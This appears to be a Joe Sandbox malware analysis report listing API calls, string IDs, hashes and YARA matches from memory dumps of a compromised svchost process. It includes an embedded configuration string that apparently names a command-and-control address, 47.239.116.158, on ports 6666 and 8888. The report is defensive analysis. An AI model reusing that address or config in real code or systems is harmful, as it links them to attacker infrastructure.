                                                                                                              • Source File: 00000004.00000002.3345070075.0000000002A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2a00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _memset$_vswprintf_s
                                                                                                              • String ID: D
                                                                                                              • API String ID: 3424173483-2746444292
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3349974011.0000000004C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4c70000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: _memset$_vswprintf_s
                                                                                                              • String ID: D
                                                                                                              • API String ID: 3424173483-2746444292
                                                                                                              APIs
                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 04DF949A
                                                                                                                • Part of subcall function 04DFEFD6: std::exception::exception.LIBCMT ref: 04DFEFEB
                                                                                                                • Part of subcall function 04DFEFD6: __CxxThrowException@8.LIBCMT ref: 04DFF000
                                                                                                                • Part of subcall function 04DFEFD6: std::exception::exception.LIBCMT ref: 04DFF011
                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 04DF94D2
                                                                                                                • Part of subcall function 04DFEF89: std::exception::exception.LIBCMT ref: 04DFEF9E
                                                                                                                • Part of subcall function 04DFEF89: __CxxThrowException@8.LIBCMT ref: 04DFEFB3
                                                                                                                • Part of subcall function 04DFEF89: std::exception::exception.LIBCMT ref: 04DFEFC4
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                                                                                              • String ID: invalid string position$string too long
                                                                                                              • API String ID: 1823113695-4289949731
                                                                                                              APIs
                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 04DF8519
                                                                                                                • Part of subcall function 04DFEFD6: std::exception::exception.LIBCMT ref: 04DFEFEB
                                                                                                                • Part of subcall function 04DFEFD6: __CxxThrowException@8.LIBCMT ref: 04DFF000
                                                                                                                • Part of subcall function 04DFEFD6: std::exception::exception.LIBCMT ref: 04DFF011
                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 04DF8537
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                                                                                              • String ID: invalid string position$string too long
                                                                                                              • API String ID: 963545896-4289949731
                                                                                                              APIs
                                                                                                              • lstrlenW.KERNEL32(|p1:47.239.116.158|o1:6666|t1:1|p2:47.239.116.158|o2:8888|t2:1|p3:127.0.0.1|o3:80|t3:1|dd:1|cl:1|fz:,?,02587869,?,?,?,?,?,?,02597B00,0000000C,02587911,?), ref: 02586396
                                                                                                                • Part of subcall function 02585E30: _memset.LIBCMT ref: 02585E61
                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02586110,00000000,00000000,00000000), ref: 025863BE
                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,02587869,?,?,?,?,?,?,02597B00,0000000C,02587911,?), ref: 025863CC
                                                                                                              Strings
                                                                                                              • |p1:47.239.116.158|o1:6666|t1:1|p2:47.239.116.158|o2:8888|t2:1|p3:127.0.0.1|o3:80|t3:1|dd:1|cl:1|fz:, xrefs: 02586391
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateObjectSingleThreadWait_memsetlstrlen
                                                                                                              • String ID: |p1:47.239.116.158|o1:6666|t1:1|p2:47.239.116.158|o2:8888|t2:1|p3:127.0.0.1|o3:80|t3:1|dd:1|cl:1|fz:
                                                                                                              • API String ID: 2656291350-42098077
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3345070075.0000000002A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2a00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __calloc_crt__init_pointers__mtterm_free
                                                                                                              • String ID:
                                                                                                              • API String ID: 3556499859-0
                                                                                                              • Opcode ID: 0bdfae7caacf7fadaa519cb4cc608f3d6f4d07e01262948322c351cd334035d8
                                                                                                              • Instruction ID: 49b02a9149cbd402968a90a28866de49811e28ad9cf0fd1b4a4bba2cc54faf88
                                                                                                              • Opcode Fuzzy Hash: 0bdfae7caacf7fadaa519cb4cc608f3d6f4d07e01262948322c351cd334035d8
                                                                                                              • Instruction Fuzzy Hash: 5A316131840A31EFE721AF759DC870A7EA6EB48765B188516E805CB2B0FF31D481CF50
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3349974011.0000000004C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4c70000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: __calloc_crt__init_pointers__mtterm_free
                                                                                                              • String ID:
                                                                                                              • API String ID: 3556499859-0
                                                                                                              • Opcode ID: 9e98d67c59dfef5c1616e1a423f3ae33231e8822f93de90274e6364e42df18fa
                                                                                                              • Instruction ID: ed0473c1f4766e7634d5798f8d02ba7605c97218610b1286dd14719c4e849786
                                                                                                              • Opcode Fuzzy Hash: 9e98d67c59dfef5c1616e1a423f3ae33231e8822f93de90274e6364e42df18fa
                                                                                                              • Instruction Fuzzy Hash: 21319E719017709FFB12FFB58C98A267FA5EB44B64B10952AFC109B1B1EB31A041EF40
                                                                                                              APIs
                                                                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0258E549
                                                                                                              • __isleadbyte_l.LIBCMT ref: 0258E57C
                                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 0258E5AD
                                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 0258E61B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                              • String ID:
                                                                                                              • API String ID: 3058430110-0
                                                                                                              • Opcode ID: 27e1653706bb2c0c18b92a44b19bb85f915c4f50e2361729c966964622be8fa3
                                                                                                              • Instruction ID: 7f7bbf5fcd896d2c289a8827c9450ad6ed3b98bf2d8fb99047d6c0ded032a2be
                                                                                                              • Opcode Fuzzy Hash: 27e1653706bb2c0c18b92a44b19bb85f915c4f50e2361729c966964622be8fa3
                                                                                                              • Instruction Fuzzy Hash: B531D271A04256EFDB20EF64D882ABD3FF1BF02214F148569F065AB191E7B0DD50DB58
                                                                                                              APIs
                                                                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 04E0A646
                                                                                                              • __isleadbyte_l.LIBCMT ref: 04E0A679
                                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 04E0A6AA
                                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 04E0A718
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                              • String ID:
                                                                                                              • API String ID: 3058430110-0
                                                                                                              • Opcode ID: ec7c1bb397f8d3298b5bf60dcb17f6f9454367f7123a65921b450734af83b63f
                                                                                                              • Instruction ID: 2a52ade9dfdc0e56706cc03d3d7df4ff9920f1a64fa9004a8b278d2c647b2d19
                                                                                                              • Opcode Fuzzy Hash: ec7c1bb397f8d3298b5bf60dcb17f6f9454367f7123a65921b450734af83b63f
                                                                                                              • Instruction Fuzzy Hash: D8318D7160034AEFDB20DF64E8909AA3BB5BF11318B15D979E4A19B1D0E331E981DB50
                                                                                                              APIs
                                                                                                              • SetLastError.KERNEL32(0000139F), ref: 025843DC
                                                                                                                • Part of subcall function 025813A0: HeapAlloc.KERNEL32(00000000,00000000,?,?,?,?), ref: 025813CB
                                                                                                                • Part of subcall function 025841D0: EnterCriticalSection.KERNEL32(02584F95,02584E35,025842AE,00000000,?,?,02584E35,?,?,?,?,00000000,000000FF), ref: 025841D8
                                                                                                                • Part of subcall function 025841D0: LeaveCriticalSection.KERNEL32(02584F95,?,?,?,00000000,000000FF), ref: 025841E6
                                                                                                                • Part of subcall function 02584C50: HeapFree.KERNEL32(?,00000000,?,00000000,02584E35,?,025842B8,02584E35,00000000,?,?,02584E35,?), ref: 02584C77
                                                                                                              • SetLastError.KERNEL32(00000000,?), ref: 025843C7
                                                                                                              • SetLastError.KERNEL32(00000057), ref: 025843F1
                                                                                                              • WSAGetLastError.WS2_32(?), ref: 02584400
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast$CriticalHeapSection$AllocEnterFreeLeave
                                                                                                              • String ID:
                                                                                                              • API String ID: 2060118545-0
                                                                                                              • Opcode ID: 1a906e03da93dcb6f658d52892987dbc060a85087de2808677c18e30b69fa353
                                                                                                              • Instruction ID: d8d2b072c9cf246bfbe06026858ea04bc1d6c0a364f0982fa412b6ef2b90572a
                                                                                                              • Opcode Fuzzy Hash: 1a906e03da93dcb6f658d52892987dbc060a85087de2808677c18e30b69fa353
                                                                                                              • Instruction Fuzzy Hash: FF110A32E055199B8B10FE79F8846EEB7A8FFC4322B0545A6ED0CE7200EB75892546D4
                                                                                                              APIs
                                                                                                              • _free.LIBCMT ref: 04DFDEE3
                                                                                                              • _free.LIBCMT ref: 04DFDF25
                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,04DFDCE5), ref: 04DFDF4C
                                                                                                              • HeapFree.KERNEL32(00000000), ref: 04DFDF53
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Heap_free$FreeProcess
                                                                                                              • String ID:
                                                                                                              • API String ID: 1072109031-0
                                                                                                              • Opcode ID: 0c270e80192cc9f8f93e573d70667088b7c4551d287f1167a6150f6ad53e30ad
                                                                                                              • Instruction ID: 2e9997d50e4e21f4797690d17f281859af43f0e682af0a99d11237060573ab93
                                                                                                              • Opcode Fuzzy Hash: 0c270e80192cc9f8f93e573d70667088b7c4551d287f1167a6150f6ad53e30ad
                                                                                                              • Instruction Fuzzy Hash: AA117971600700ABE630DB65CC44F53B3AAFF88701F15891DE68A87A80D774F842CB61
                                                                                                              APIs
                                                                                                              • WSAEventSelect.WS2_32(?,02583A9B,00000023), ref: 02583BE2
                                                                                                              • WSAGetLastError.WS2_32 ref: 02583BED
                                                                                                              • send.WS2_32(?,00000000,00000000,00000000), ref: 02583C38
                                                                                                              • WSAGetLastError.WS2_32 ref: 02583C43
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast$EventSelectsend
                                                                                                              • String ID:
                                                                                                              • API String ID: 259408233-0
                                                                                                              • Opcode ID: e6fb258cab0387814e21923ed2b9650c650481cf283a074a559bed23e41891c0
                                                                                                              • Instruction ID: 09fa5b1eabdfca3190164edb2e2afcb28f8ccebdc6eea2a30480ae1283550caa
                                                                                                              • Opcode Fuzzy Hash: e6fb258cab0387814e21923ed2b9650c650481cf283a074a559bed23e41891c0
                                                                                                              • Instruction Fuzzy Hash: CE1191B1600700ABD320AF79D8C8A47BAE9FF88710F410A2DE697C3640D771E4509F54
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3345070075.0000000002A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2a00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                              • String ID:
                                                                                                              • API String ID: 3016257755-0
                                                                                                              • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                              • Instruction ID: 837f9228f86254237e7433bfa941fae3089971f5e4aa4bd927c8726f18264ad3
                                                                                                              • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                              • Instruction Fuzzy Hash: F311487604018EBBCF165F84EE818EE3F63BB08358B488815FA6859070DB36D5B1BF81
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3349974011.0000000004C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4c70000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                              • String ID:
                                                                                                              • API String ID: 3016257755-0
                                                                                                              • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                              • Instruction ID: 899cb695bb8674dcefb73dc74920c477b65c34fca0427e0934cac5ea08e5187e
                                                                                                              • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                              • Instruction Fuzzy Hash: 67114E7200014EFBCF266E85CC55CEE3F27BB19358B588459FA1859130E636EAB1AB81
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                              • String ID:
                                                                                                              • API String ID: 3016257755-0
                                                                                                              • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                              • Instruction ID: 174ad9a973727f7639ea756733d0fb1c3ac709779024c97be1b6c53a0bdf1b46
                                                                                                              • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                              • Instruction Fuzzy Hash: 5D11393240014ABBCF126E84DC418EE3F62BB5C258B898416FA1869831D777C9B2AB95
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                              • String ID:
                                                                                                              • API String ID: 3016257755-0
                                                                                                              • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                              • Instruction ID: c0ca3f5dab26f579fcf6a35af3cc0a75b82671d59e50e3135f2809e2d402e3e5
                                                                                                              • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                              • Instruction Fuzzy Hash: 2E11393240014EBFCF265FC4CC42CEE3F66BB18358B499855FA2859170D736E9B2AB91
                                                                                                              APIs
                                                                                                              • __getptd.LIBCMT ref: 02A0D487
                                                                                                                • Part of subcall function 02A09348: __getptd_noexit.LIBCMT ref: 02A0934B
                                                                                                                • Part of subcall function 02A09348: __amsg_exit.LIBCMT ref: 02A09358
                                                                                                              • __amsg_exit.LIBCMT ref: 02A0D4A7
                                                                                                              • __lock.LIBCMT ref: 02A0D4B7
                                                                                                              • _free.LIBCMT ref: 02A0D4E7
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3345070075.0000000002A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2a00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __amsg_exit$__getptd__getptd_noexit__lock_free
                                                                                                              • String ID:
                                                                                                              • API String ID: 3170801528-0
                                                                                                              • Opcode ID: fc152d664be9bacc00192f14bb79ddadcf9c02b7d24845c1b46f6ff2f6b87a72
                                                                                                              • Instruction ID: cf332bb4f1cdd16e34150476e2bbcae2b447cf1eb2a3e8ebe212828618921f9e
                                                                                                              • Opcode Fuzzy Hash: fc152d664be9bacc00192f14bb79ddadcf9c02b7d24845c1b46f6ff2f6b87a72
                                                                                                              • Instruction Fuzzy Hash: 82012D32A41A21ABD725AFA8BAC479DB7A1EF04B24F058005E8116B2D0CF35B581CFD6
                                                                                                              APIs
                                                                                                              • __getptd.LIBCMT ref: 04C842A0
                                                                                                                • Part of subcall function 04C8386A: __getptd_noexit.LIBCMT ref: 04C8386D
                                                                                                                • Part of subcall function 04C8386A: __amsg_exit.LIBCMT ref: 04C8387A
                                                                                                              • __amsg_exit.LIBCMT ref: 04C842C0
                                                                                                              • __lock.LIBCMT ref: 04C842D0
                                                                                                              • _free.LIBCMT ref: 04C84300
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3349974011.0000000004C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4c70000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: __amsg_exit$__getptd__getptd_noexit__lock_free
                                                                                                              • String ID:
                                                                                                              • API String ID: 3170801528-0
                                                                                                              • Opcode ID: 09695a788960c7b79bb7b2e6b7bb34a54df84041e1a98278b1a16c4ff9f0b368
                                                                                                              • Instruction ID: 160fc352134a9643ce99ae3fa85b0cc4771e06ac80c8a12f807acd87ca767025
                                                                                                              • Opcode Fuzzy Hash: 09695a788960c7b79bb7b2e6b7bb34a54df84041e1a98278b1a16c4ff9f0b368
                                                                                                              • Instruction Fuzzy Hash: E201C431D01B32EBE724FF64884875973A2BF01B29F54010DE800A3290DB387A82EBD9
                                                                                                              APIs
                                                                                                              • EnterCriticalSection.KERNEL32(02584F95,02584E35,025842AE,00000000,?,?,02584E35,?,?,?,?,00000000,000000FF), ref: 025841D8
                                                                                                              • LeaveCriticalSection.KERNEL32(02584F95,?,?,?,00000000,000000FF), ref: 025841E6
                                                                                                              • LeaveCriticalSection.KERNEL32(02584F95), ref: 02584247
                                                                                                              • SetEvent.KERNEL32(8520468B), ref: 02584262
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CriticalSection$Leave$EnterEvent
                                                                                                              • String ID:
                                                                                                              • API String ID: 3394196147-0
                                                                                                              • Opcode ID: a2621a42711db5e91f0d45e4e53dc1978c7a44ca39761d957f209f85685544df
                                                                                                              • Instruction ID: 9aecfb4207d2f3e2b837428f6b39a510a09db052866cb4ed9341bc4411a7748e
                                                                                                              • Opcode Fuzzy Hash: a2621a42711db5e91f0d45e4e53dc1978c7a44ca39761d957f209f85685544df
                                                                                                              • Instruction Fuzzy Hash: D81103B0A05B019FD725DF74C584AA6BBE9BF48301F95892DE95E97200EB30E815CB40
                                                                                                              APIs
                                                                                                              • timeGetTime.WINMM(00000001,?,00000001,?,02583C2F,?,?,00000001), ref: 02584AF5
                                                                                                              • InterlockedIncrement.KERNEL32(00000001), ref: 02584B04
                                                                                                              • InterlockedIncrement.KERNEL32(00000001), ref: 02584B11
                                                                                                              • timeGetTime.WINMM(?,02583C2F,?,?,00000001), ref: 02584B28
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: IncrementInterlockedTimetime
                                                                                                              • String ID:
                                                                                                              • API String ID: 159728177-0
                                                                                                              • Opcode ID: 88b8d5d16ab20b6e1cd0fe4a00d0ac215df70516434fedafa68adf84e23972bd
                                                                                                              • Instruction ID: 6737667a5a6fa3e3bddc24c8c21a09174bea6dc4a1b31e6aa829bb8d429a2701
                                                                                                              • Opcode Fuzzy Hash: 88b8d5d16ab20b6e1cd0fe4a00d0ac215df70516434fedafa68adf84e23972bd
                                                                                                              • Instruction Fuzzy Hash: D601C8B1A007059FCB21EF6AD88095AFBE9BF98750741892AE549C7600E7B4E6448FA4
                                                                                                              APIs
                                                                                                              • CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 02583647
                                                                                                              • _free.LIBCMT ref: 0258367C
                                                                                                                • Part of subcall function 02586F29: RtlFreeHeap.NTDLL(00000000,00000000,?,0258996C,00000000,?,0258A030,00000000,00000001,00000000,?,0258C1C3,00000018,02597BF0,0000000C,0258C253), ref: 02586F3F
                                                                                                                • Part of subcall function 02586F29: GetLastError.KERNEL32(00000000,?,0258996C,00000000,?,0258A030,00000000,00000001,00000000,?,0258C1C3,00000018,02597BF0,0000000C,0258C253,00000000), ref: 02586F51
                                                                                                              • _malloc.LIBCMT ref: 025836B7
                                                                                                              • _memset.LIBCMT ref: 025836C5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateErrorFreeHeapLastTimerWaitable_free_malloc_memset
                                                                                                              • String ID:
                                                                                                              • API String ID: 3340475617-0
                                                                                                              • Opcode ID: ecaae943c04311dbdbe7cbe452bb904950fb0d9f5f4ef6829c14dde2d371b7b0
                                                                                                              • Instruction ID: 2e9e566fe48802f4212de1fc2bd69b0b1f2eef7bb69b23ffb904db38eddc43a3
                                                                                                              • Opcode Fuzzy Hash: ecaae943c04311dbdbe7cbe452bb904950fb0d9f5f4ef6829c14dde2d371b7b0
                                                                                                              • Instruction Fuzzy Hash: 3801C8B1900B059FE3209F7AD885B97BAE9FB85314F10482EE5AE97301D670A8048F64
                                                                                                              APIs
                                                                                                              • CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 04DF3667
                                                                                                              • _free.LIBCMT ref: 04DF369C
                                                                                                                • Part of subcall function 04DFF689: RtlFreeHeap.NTDLL(00000000,00000000,?,04E03E9C,00000000,?,04E04550,00000000,00000001,00000000,?,04E08E36,00000018,04E17468,0000000C,04E08EC6), ref: 04DFF69F
                                                                                                                • Part of subcall function 04DFF689: GetLastError.KERNEL32(00000000,?,04E03E9C,00000000,?,04E04550,00000000,00000001,00000000,?,04E08E36,00000018,04E17468,0000000C,04E08EC6,00000000), ref: 04DFF6B1
                                                                                                              • _malloc.LIBCMT ref: 04DF36D7
                                                                                                              • _memset.LIBCMT ref: 04DF36E5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CreateErrorFreeHeapLastTimerWaitable_free_malloc_memset
                                                                                                              • String ID:
                                                                                                              • API String ID: 3340475617-0
                                                                                                              • Opcode ID: 8eb60a56db472e57e570ada47b5509db5d723c4121a08cc2a261389b8288715e
                                                                                                              • Instruction ID: c083dfad70620506d0968b8b2a66198515812d68bb4eda04a1dcae6c5d46e05c
                                                                                                              • Opcode Fuzzy Hash: 8eb60a56db472e57e570ada47b5509db5d723c4121a08cc2a261389b8288715e
                                                                                                              • Instruction Fuzzy Hash: 3F01DEB1900B04DFE3209F7A9881B97BAE9FF45319F11482ED5AE87301D63578448F70
                                                                                                              APIs
                                                                                                              • _malloc.LIBCMT ref: 02A069DE
                                                                                                                • Part of subcall function 02A06930: __FF_MSGBANNER.LIBCMT ref: 02A06949
                                                                                                                • Part of subcall function 02A06930: __NMSG_WRITE.LIBCMT ref: 02A06950
                                                                                                              • std::exception::exception.LIBCMT ref: 02A06A13
                                                                                                              • std::exception::exception.LIBCMT ref: 02A06A2D
                                                                                                              • __CxxThrowException@8.LIBCMT ref: 02A06A3E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3345070075.0000000002A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2a00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: std::exception::exception$Exception@8Throw_malloc
                                                                                                              • String ID:
                                                                                                              • API String ID: 2388904642-0
                                                                                                              • Opcode ID: 5cc5bd0d1538292c0d459ef85d17af099679b52743cea41d158f997f20c39b5d
                                                                                                              • Instruction ID: cc81806a0c6d4893a6b2b590a6bb143c4d1a3318f0d71405447c2cb85c1b7340
                                                                                                              • Opcode Fuzzy Hash: 5cc5bd0d1538292c0d459ef85d17af099679b52743cea41d158f997f20c39b5d
